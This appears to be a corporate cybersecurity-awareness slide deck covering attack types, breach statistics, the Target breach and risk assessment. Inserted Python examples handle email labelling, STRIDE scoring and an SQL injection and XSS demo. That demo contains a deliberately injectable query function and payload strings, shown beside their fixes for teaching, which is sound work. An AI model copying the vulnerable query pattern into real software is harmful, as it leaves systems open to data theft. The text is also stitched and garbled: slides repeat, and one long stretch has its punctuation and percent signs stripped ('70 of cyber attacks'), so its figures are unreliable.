The deliberate exploitation of computer systems, technology-dependent enterprises and networks. Cyber attacks can use malicious code, weak passwords or other cyber exploits to gain unlawful access to systems and data, often resulting in disruptive consequences that can compromise data and lead to cybercrimes such as information and identity theft.
Cyber attacks often include the following:
• Identity theft, fraud, extortion
• Malware, pharming, phishing, spamming, spoofing, spyware, Trojans and viruses
• Stolen hardware, such as laptops or mobile devices
• Denial-of-service and distributed denial-of-service attacks
• Breach of access
• Password sniffing
• System infiltration
• Website defacement
• Private and public Web browser exploits
• Instant messaging abuse
• Intellectual property (IP) theft or unauthorized access
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Information Technology (IT) – The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise. The department within a company that is charged with establishing, monitoring and maintaining information technology systems and services.
Operational Technology (OT) – The hardware and software that detects or causes a change through the direct monitoring and/or control of physical devices, processes and events in the enterprise. OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition (SCADA) systems. OT devices and environments are typically run separately from IT departments. These are the devices that communicate with pipelines and electrical grids (and nuclear power plants).
Internet of Things – A computing concept that describes the idea of everyday physical devices (DVR systems, thermostats, refrigerators, vehicles) being connected to the internet and being able to identify themselves to other devices, which enables the devices to collect and exchange data.
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Bot – A bot is a software "robot" that performs an extensive set of automated tasks on its own. Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network. They can also be used by black hats to coordinate attacks by controlling botnets.
Botnet – A number of Internet-connected devices (e.g. computers, DVR systems and other devices), each of which is running one or more bots after being infected with malware. Botnets can be used to perform Distributed Denial of Service attacks, steal data, send spam and allow the attacker access to the device and its connection. Botnets can be rented out to other hackers or cyber criminals.
Denial of Service (DOS) and Distributed Denial of Service – A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations. Typically the computers being used are infected and part of a botnet.
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Middleware – Software that facilitates the exchange of data between two application programs within the same environment or across different hardware and network environments. Three basic types of middleware are (1) communication middleware, (2) database middleware and (3) system middleware.
Man-in-the-Middle (MITM) Attacks – An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties. The attacker is able to alter or obtain data for themselves while unknown to the other two parties.
SQL Injection and Cross-site Scripting Attacks – An attack occurrence where the attacker injects malicious code into a website. In SQL Injection, the attacker uses SQL language to obtain information back from the website that was unintended. In Cross-site Scripting, the attacker injects code that only impacts other users of the website.
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Common Vulnerabilities and Exposures (CVE) – Catalog sponsored by Homeland Security that documents known cyber threats. Vulnerabilities are known errors in a system or software that provide an attacker with direct access. Exposures are known errors that allow an attacker indirect access, which may allow the attacker to gather knowledge or content. Many of the malware and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years, but not fixed at the company level.
Zero Day Vulnerability/Attack – An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider. Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by the vendor.
Advanced Persistent Threat – A set of stealthy and continuous computer hacking processes, often orchestrated by a person or persons targeting a specific entity.
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Dark Web / Darknet – Websites located on the internet that are not accessible by normal search engines or means. Darknet sites require special software, such as TOR (The Onion Router), that helps keep users anonymous. Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or credit card data, as well as botnet rentals. Bitcoins are traded on the Dark Web.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger in the cloud that – along with all Bitcoin transactions – is verified by a massive amount of computing power. Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward in the form of a few bitcoins. As more and more bitcoins are created, the difficulty of the mining process – that is, the amount of computing power involved – increases.
PHISHING
A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment.
Spear-Phishing – Phishing attacks directed at a specific individual or company. Sub-categories of Spear Phishing include Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive).
• CEO Email to Treasurer
• HR Phishing for Employee Data
• W-2 Phishing Data (IRS sent out a warning)
The majority of Phishing cases are used as a means to install malware onto a host environment.
PHISHING
Most companies battle the increase in Phishing and spear-phishing attacks by labeling each external email with some form of the following inserts:
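One way a mail gateway can apply such a label, as an added example that is not from the deck or any vendor product: tag mail whose sender is outside the company's domain, and additionally warn when an external sender's display name matches an executive (the "CEO Email to Treasurer" whaling pattern). The company domain, the executive directory and the three messages are constructed.

```python
"""Label external email and flag executive display-name lookalikes.

Added example, not from the deck or any product. Uses only Python's
standard email parser. The internal domain, executive directory and
sample messages below are constructed for illustration.
"""
from email import message_from_string
from email.utils import parseaddr

INTERNAL_DOMAINS = {"example-corp.com"}   # assumed company domain
EXTERNAL_TAG = "[EXTERNAL]"
# Constructed directory: lower-cased display name -> the executive's real address.
EXECUTIVES = {"pat ceo": "pat.ceo@example-corp.com"}


def sender_parts(msg):
    """Display name and address from the From header, normalised to lower case."""
    name, addr = parseaddr(msg.get("From", ""))
    return name.strip().lower(), addr.strip().lower()


def is_external(addr):
    domain = addr.rpartition("@")[2]
    return domain not in INTERNAL_DOMAINS


def classify(raw):
    """Return (subject_to_deliver, warnings) for one raw RFC 5322 message."""
    msg = message_from_string(raw)
    name, addr = sender_parts(msg)
    subject = msg.get("Subject", "")
    warnings = []
    if not is_external(addr):
        return subject, warnings               # internal mail passes untouched
    if not subject.startswith(EXTERNAL_TAG):   # never double-tag on re-delivery
        subject = f"{EXTERNAL_TAG} {subject}"
    # External sender using an executive's name: the whaling pattern.
    if name in EXECUTIVES and EXECUTIVES[name] != addr:
        warnings.append(f"display name '{name}' matches an executive but address is {addr}")
    return subject, warnings


# Constructed sample messages.
SPOOFED_EXEC = (
    "From: Pat CEO <pat.ceo@webmail-example.net>\n"
    "To: treasurer@example-corp.com\n"
    "Subject: Invoice approval needed\n\n"
    "Please call me about the attached invoice.\n"
)
INTERNAL = "From: Jane Doe <jdoe@example-corp.com>\nSubject: Lunch\n\nNoon?\n"
VENDOR = "From: Vendor Support <support@vendor-example.com>\nSubject: Ticket 123\n\nResolved.\n"

if __name__ == "__main__":
    for raw in (SPOOFED_EXEC, INTERNAL, VENDOR):
        print(classify(raw))
```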
MALWARE
Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and now ransomware. Malware is designed to interfere with normal computer operation, usually giving hackers a chance to gain access to your computer and collect sensitive personal information.
• Malware is seen as the first access point used in connection with hacking attempts
• Ransomware is the latest version of malware that has been in the headlines and represents one of the largest cyber threats to most companies
Source: Verizon Data Breach Investigations Report 2016
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the user's files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key.
• The use of BITCOINS is typically the payment method
• Ransomware attacks quadrupled to 4,000 per day from 2015 to 2016
• This year's WannaCry ransomware attack impacted over 200,000 people across 150 countries (included a worm)
COMMON CYBER ATTACK PATTERNS
• 78% of all breaches result from these 5 attack patterns:
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63% of all breaches are attributable to the top 2 alone.
Common attack patterns account for a vast majority of documented breaches.
Source: Verizon Data Breach Investigations Report 2016
WEB APP ATTACKS
• Modern websites with business functionality increase the impact of a successful breach
• Recycled or unchanged default passwords can compromise an organization's security efforts
• Breaching a web application can open the gates to internal applications and code
• Cross site scripting and SQL injection are the most common attack attempts
Source: Verizon Data Breach Investigations Report 2016
POINT-OF-SALE (POS) INTRUSIONS
• Attackers target systems capturing customer payment information during legitimate transactions
• Attacks can exploit POS software or hardware
• Attackers commonly target POS system vendors as a means to exploit an organization's POS system
• Retail and accommodation sites are experiencing massive POS attacks
Source: Verizon Data Breach Investigations Report 2016
PRIVILEGE MISUSE
• Internal parties act (maliciously or not) in a way that causes a breach
• Most actors are outside Executive Management and leadership roles
• While financial reasons still motivate most actors, espionage has become an increasingly common motivation
• Most breaches take months or longer to discover
Source: Verizon Data Breach Investigations Report 2016
CYBER-ESPIONAGE
• External parties (possibly state-affiliated or organized crime) infiltrating an organization's systems
• Attacks commonly begin through phishing and/or exploiting backdoors in software (browsers or even websites)
• Over 90% of breaches target trade secrets for exfiltration
Source: Verizon Data Breach Investigations Report 2016
CRIMEWARE
• Crimeware contains any malware or other incident that focuses directly on financial opportunity
• Ransomware, keyloggers and use of backdoors are the most common occurrences of Crimeware
• Crimeware is typically introduced through the following:
- Email Attachment
- Cross-site scripting from visited website
- Email Link
Source: Verizon Data Breach Investigations Report 2016
KEY CYBER ATTACKS IN THE NEWS
• Target Data Breach – 70 million PII records of users and 40 million credit cards stolen
• Sony Attack – Malware attack that erased over half of the company's servers and PCs and released 4 unreleased movies and over 45,000 social security numbers
• Yahoo Data Breach (2013/2014) – August breach that exposed PII of 1 billion users; 2014 data breach of 500 million users. Additional data loss in 2016
• Prepaid Card/ATM Scheme (2013) – $45 million stolen (worldwide)
• Bank of Bangladesh (February 2016) – $81 million stolen
COMPLEXITY BEHIND THE TARGET ATTACK
• Cyber attackers first attacked a third-party vendor (the HVAC vendor) through the use of malware introduced via a phishing campaign
• Used the HVAC vendor's stolen credentials to gain access to a third-party website used for submitting electronic invoices
• Injected code into a vulnerability of the electronic submission process to gain further access to Target's internal network
• Performed reconnaissance of the environment and obtained domain administrator access
• Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location. Worked around firewalls and other defenses
COMPLEXITY BEHIND THE TARGET ATTACK
• Gained access to a server that contained a SQL database and were able to download 70 million PII records of customers
• Attackers then gained access to the POS environment (should have been walled off)
• Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
• Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
• Attackers then copied credit card files to another server that had remote FTP ability and sent the files to themselves
RANSOMWARE – ANATOMY OF AN ATTACK
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach. Main reasons for companies' struggles are:
• Expansion of the attack surface
• Continued innovations in technology
• Lack of understanding of the company's information assets and the assets' value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
• Lack of skilled resources (people and time)
• Lack of funds
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE, TECHNOLOGY, PROCESSES
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE: Ensure best practice processes and associated management frameworks are in place. Regular audits and reviews are important.
IMPLEMENTING A CYBERSECURITY PROGRAM
• Understand the organizational risk and where high-risk assets exist
• Risk assessments should be performed annually or when significant changes to the environment occur
• Stinnett uses Microsoft STRIDE Threat Modeling to semi-qualitatively measure cybersecurity risks to identify, estimate and prioritize information security risks
Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results
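The five steps above carried through in Python, as an added example that is not Stinnett's methodology or tooling: each asset gets a location, a value classification and a "who would want it" note (the asset questions the deck asks), a likelihood for each STRIDE threat that applies, and a calculated risk of value times likelihood. The assets, ratings, 1-5 scales and rating bands are constructed.

```python
"""Semi-qualitative STRIDE risk scoring over a constructed asset list.

Added example, not Stinnett's methodology or tooling. Steps:
  1. identify assets        2. record asset locations
  3. classify asset value   4. model STRIDE threats per asset (likelihood)
  5. calculate risk = value x likelihood and prioritise
Assets, ratings, the 1-5 scales and the rating bands are constructed.
"""
from dataclasses import dataclass, field

STRIDE = {
    "S": "Spoofing",
    "T": "Tampering",
    "R": "Repudiation",
    "I": "Information disclosure",
    "D": "Denial of service",
    "E": "Elevation of privilege",
}


@dataclass
class Asset:
    name: str
    location: str          # step 2: where the asset is stored (deck: "Data Location")
    value: int             # step 3: 1-5 classification of what the asset is worth
    who_wants_it: str      # deck: "Who Would Want the Data"
    threats: dict = field(default_factory=dict)   # step 4: STRIDE code -> likelihood 1-5


def risk_score(value, likelihood):
    """Step 5: semi-qualitative risk, 1..25."""
    return value * likelihood


def rating(score):
    """Constructed rating bands for the 1..25 score."""
    if score >= 15:
        return "HIGH"
    if score >= 8:
        return "MEDIUM"
    return "LOW"


def threat_model(assets):
    """Every (asset, STRIDE threat) pair with its calculated risk, highest first."""
    rows = []
    for a in assets:
        for code, likelihood in a.threats.items():
            score = risk_score(a.value, likelihood)
            rows.append({"asset": a.name, "location": a.location, "threat": STRIDE[code],
                         "impact": a.value, "likelihood": likelihood,
                         "score": score, "rating": rating(score)})
    rows.sort(key=lambda r: (-r["score"], r["asset"], r["threat"]))
    return rows


def top_risks(assets, n=3):
    """The n highest-scoring asset/threat pairs, i.e. where mitigation effort goes first."""
    return [(r["asset"], r["threat"], r["score"]) for r in threat_model(assets)[:n]]


def rating_summary(assets):
    rows = threat_model(assets)
    return {band: sum(1 for r in rows if r["rating"] == band) for band in ("HIGH", "MEDIUM", "LOW")}


# Step 1: constructed asset register using the asset types the deck lists.
ASSETS = [
    Asset("Credit card data", "POS servers / payment DB", 5, "Card fraud rings",
          {"I": 4, "T": 2, "S": 3}),
    Asset("Employee records (PII)", "HR system", 4, "Identity thieves",
          {"I": 4, "E": 2}),
    Asset("Trade secrets", "Engineering file share", 5, "Competitors, state actors",
          {"I": 3, "R": 1}),
    Asset("Bank account credentials", "Treasury workstation", 5, "Wire fraudsters",
          {"S": 4, "E": 3}),
]

if __name__ == "__main__":
    for r in threat_model(ASSETS):
        print(f"{r['rating']:6} {r['score']:2}  {r['asset']:26} {r['threat']:24} @ {r['location']}")
    print(rating_summary(ASSETS))
```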
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
LEARNING OBJECTIVES
bull Why should we be concerned with cybersecurity
bull What are some key cybersecurity definitionsbull What are some emerging cybersecurity trends
and threatsbull What happened with some recent high-profile
cybersecurity attacksbull What are some cybersecurity roadblocksbull What are steps to evaluate your companyrsquos
cybersecurity risk levelbull How can you take preventive measures and
protect yourself and your company
6
copyStinnett amp Associates LLC
MY FIRST INTRODUCTION TO A CYBER CRIMINAL
7
copyStinnett amp Associates LLC
WHAT DO ALL OF THESE ORGANIZATIONS HAVE IN COMMON
8
copyStinnett amp Associates LLC
hellipAND THESE
9
copyStinnett amp Associates LLC
hellipTHEY ALL HAVE AT LEAST TWO THINGS IN COMMON
10
ALL HAVE BEEN VICTIMS OF CYBER ATTACK amp BREACH
ALL HAD SOMETHING OF VALUE TO THE ATTACKER
copyStinnett amp Associates LLC11
LIST OF RECENT HEADLINES
copyStinnett amp Associates LLC
WHY DO WE CARE
12
Security compromises are a persistent business risk
bull US Department of Commerce estimates intellectual
property theft costs US companies $250 billion
annually
bull In 2015 38 more security incidents were
detected than in 2014
bull 70 of cyber attacks and data breaches go
undetected
bull 69 of organizations learn of their breach from an
outside entity such as law enforcement customers
or suppliers
bull Data breaches cost companies an average of $154
per compromised record
bull Cyberinsurance market will reach $75 billion in
annual sales by 2020 up from $25 billion in 2016
bull Cyber Crime costs estimated to reach $2 Trillion by
2019
bull 20 of small and mid-size businesses have been
cyber crime targets
Source PwC Global State of Information Security Survey 2016US Dept of Commerce Stolen Intellectual Property Harms American Businesses Says Acting Deputy Secretary Blank 2012IBM and Ponemon 2015 Cost of Data Breach Study Global Analysis
copyStinnett amp Associates LLC
FINANCIAL GAIN STILL 1 REASON
13
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2015
Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information
(PII) is worth more on the black
market (ldquoThe Dark Webrdquo) then Credit
Card Numbers
bull Ransomware payments estimated
over $1 billion in 2016
bull 70 of all Ransomware was paid
bull 20 paid over $20000
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain
14
bull Theft of funds (Bank Accounts)bull Extortion (Ransomware)bull Selling of stolen credit cardsbull Selling of PII databull Insider trading informationbull Using compromised environment for other
attacks or for rent
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Common Vulnerabilities and Exposures (CVE) – A catalog sponsored by Homeland Security that documents known cyber threats. Vulnerabilities are known errors in a system or software that provide an attacker with direct access. Exposures are known errors that allow an attacker indirect access, which may allow the attacker to gather knowledge or content. Many of the malware and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level.
Zero Day Vulnerability/Attack – An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider. Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by the vendor.
Advanced Persistent Threat – A set of stealthy and continuous computer hacking processes, often orchestrated by a person or persons targeting a specific entity.
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Dark Web / Darknet – Websites located on the internet that are not accessible by normal search engines or means. Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous. Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or credit card data, as well as botnet rentals. Bitcoins are traded on the Dark Web.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger in the cloud that – along with all Bitcoin transactions – is verified by a massive amount of computing power. Bitcoin mining is the process through which bitcoins are released into circulation; it involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward in the form of a few bitcoins. As more and more bitcoins are created, the difficulty of the mining process – that is, the amount of computing power involved – increases.
PHISHING
A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment.
Spear-Phishing – Phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive).
• CEO email to Treasurer
• HR phishing for employee data
• W-2 phishing for data (the IRS sent out a warning)
The majority of phishing cases are used as a means to install malware onto a host environment.
PHISHING
Most companies battle the increase in phishing and spear-phishing attacks by labeling each external email with some form of the following inserts:
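Added example, not from the presentation: one way a mail gateway can apply the external-email labeling described above, with an extra check for the "CEO email to Treasurer" spear-phishing pattern (an executive's name on an outside address). The internal domain, executive directory and tag wording are constructed for illustration.

```python
"""Added example, not from the presentation: label external email and flag
executive-name impersonation. Domain, directory and wording are constructed."""
from email.utils import parseaddr

INTERNAL_DOMAINS = {"example-corp.test"}          # constructed internal domain
EXECUTIVES = {"jane doe", "john roe"}             # constructed executive directory
EXTERNAL_TAG = "[EXTERNAL]"
BANNER = ("CAUTION: This email originated from outside the organization. "
          "Do not open attachments or click links unless you recognize the sender.")
IMPERSONATION_NOTE = ("WARNING: the sender's display name matches an executive "
                      "but the address is not an internal one.")


def classify_sender(from_header: str) -> tuple:
    """Return (is_external, impersonates_executive) for a From: header value.

    Caveat: the From: header is attacker-controlled. A real gateway pairs this
    check with SPF/DKIM/DMARC results so that an internal-looking address which
    fails authentication is also treated as external."""
    display, addr = parseaddr(from_header)
    domain = addr.rpartition("@")[2].lower()
    # Unknown or malformed senders (no domain) are treated as external.
    is_external = domain not in INTERNAL_DOMAINS
    normalized_name = " ".join(display.split()).lower()
    impersonates = is_external and normalized_name in EXECUTIVES
    return is_external, impersonates


def label_message(headers: dict, body: str) -> tuple:
    """Return (subject, body) with the tag and banner added for external mail."""
    subject = headers.get("Subject", "")
    is_external, impersonates = classify_sender(headers.get("From", ""))
    if not is_external:
        return subject, body
    if EXTERNAL_TAG not in subject:        # replies already carry the tag
        subject = f"{EXTERNAL_TAG} {subject}".strip()
    banner = BANNER
    if impersonates:
        banner = f"{IMPERSONATION_NOTE}\n{banner}"
    return subject, f"{banner}\n\n{body}"


if __name__ == "__main__":
    # Constructed message: an executive's name on a webmail address.
    msg = {"From": "Jane Doe <jane.doe.ceo@webmail.test>", "Subject": "Urgent wire"}
    subject, body = label_message(msg, "Please send the wire today.")
    print(subject)
    print(body)
```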
MALWARE
Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and now ransomware. Malware is designed to interfere with normal computer operation, usually giving hackers a chance to gain access to your computer and collect sensitive personal information.
• Malware is seen as the first access point used in connection with hacking attempts
• Ransomware is the latest version of malware that has been in the headlines and represents one of the largest cyber threats to most companies
Source: Verizon Data Breach Investigations Report 2016
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the user's files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decryption key.
• The use of BITCOINS is typically the payment method
• Ransomware attacks quadrupled to 4,000 per day from 2015 to 2016
• This year's WannaCry ransomware attack impacted over 200,000 people across 150 countries (it included a worm)
COMMON CYBER ATTACK PATTERNS
• 78% of all breaches result from these 5 attack patterns:
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63% of all breaches are attributable to the top 2 alone
Common attack patterns account for a vast majority of documented breaches
Source: Verizon Data Breach Investigations Report 2016
WEB APP ATTACKS
• Modern websites with business functionality increase the impact of a successful breach
• Recycled or unchanged default passwords can compromise an organization's security efforts
• Breaching a web application can open the gates to internal applications and code
• Cross-site scripting and SQL injection are the most common attack attempts
Source: Verizon Data Breach Investigations Report 2016
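Added example, not from the presentation, illustrating the SQL Injection and Cross-site Scripting definitions earlier and the bullet above: the same customer lookup written the injectable way and the parameterized way, and the same comment rendering with and without output escaping. The customer table, rows and function names are constructed.

```python
"""Added example, not from the presentation: SQL injection and stored XSS,
each shown beside its fix. Table, rows and names are constructed."""
import html
import sqlite3

# Constructed sample data, the kind of table a customer-facing website queries.
SAMPLE_ROWS = [
    ("alice", "alice@example.test"),
    ("bob", "bob@example.test"),
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (username TEXT, email TEXT)")
    conn.executemany("INSERT INTO customers VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Injectable: the request value is pasted into the SQL text, so a quote
    character in the input changes the query's logic instead of being data."""
    sql = f"SELECT username, email FROM customers WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str) -> list:
    """Hardened: the value is bound as a parameter. The database treats it
    purely as data, so a quote in the input can only match a literal quote."""
    sql = "SELECT username, email FROM customers WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def render_comment_vulnerable(comment: str) -> str:
    """Stored XSS: user text is dropped into HTML unchanged, so markup in one
    user's comment runs in every other visitor's browser."""
    return f"<p>{comment}</p>"


def render_comment_safe(comment: str) -> str:
    """Hardened: escape before placing user text in HTML so it is displayed,
    never executed."""
    return f"<p>{html.escape(comment)}</p>"


def unintended_rows(conn: sqlite3.Connection, username: str) -> int:
    """Rows the vulnerable query returns beyond what the safe one does: a
    quick check of whether an input altered the query."""
    return len(lookup_vulnerable(conn, username)) - len(lookup_safe(conn, username))


if __name__ == "__main__":
    db = make_db()
    # A username containing a quote: the vulnerable query returns every row,
    # the safe query returns none because no such literal username exists.
    tampered = "x' OR '1'='1"
    print("extra rows leaked by vulnerable lookup:", unintended_rows(db, tampered))
    print(render_comment_safe("<script>alert(1)</script>"))
```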
POINT-OF-SALE (POS) INTRUSIONS
• Attackers target systems that capture customer payment information during legitimate transactions
• Attacks can exploit POS software or hardware
• Attackers commonly target POS system vendors as a means to exploit an organization's POS system
• Retail and accommodation sites are experiencing massive POS attacks
Source: Verizon Data Breach Investigations Report 2016
PRIVILEGE MISUSE
• Internal parties act (maliciously or not) in a way that causes a breach
• Most actors are outside executive management and leadership roles
• While financial reasons still motivate most actors, espionage has become an increasingly common motivation
• Most breaches take months or longer to discover
Source: Verizon Data Breach Investigations Report 2016
CYBER-ESPIONAGE
• External parties (possibly state-affiliated or organized crime) infiltrating an organization's systems
• Attacks commonly begin through phishing and/or exploiting backdoors in software (browsers or even websites)
• Over 90% of breaches target trade secrets for exfiltration
Source: Verizon Data Breach Investigations Report 2016
CRIMEWARE
• Crimeware covers any malware or other incident that focuses directly on financial opportunity
